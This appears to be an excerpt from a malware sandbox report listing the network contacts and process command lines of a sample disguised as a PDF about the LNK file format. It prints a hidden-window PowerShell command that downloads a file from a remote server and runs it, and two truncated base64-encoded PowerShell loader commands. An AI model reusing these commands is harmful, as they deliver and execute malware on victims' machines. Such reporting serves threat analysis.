Technical Information
- http://19#.##8.3.27:8080/1.pdf as %temp+/lnk文件格式解析(修改版%
- '<LOCALNET>.3.27':8080
- '<LOCALNET>.1.103':80
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -w hidden (new-object System.Net.WebClient).DownloadFile('http://19#.##8.3.27:8080/1.pdf',$env:temp+'/LNK文件格式解析(修改版).pdf');Start-Process $env:temp'/L...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASA...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASA...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -s -NoLogo -NoProfile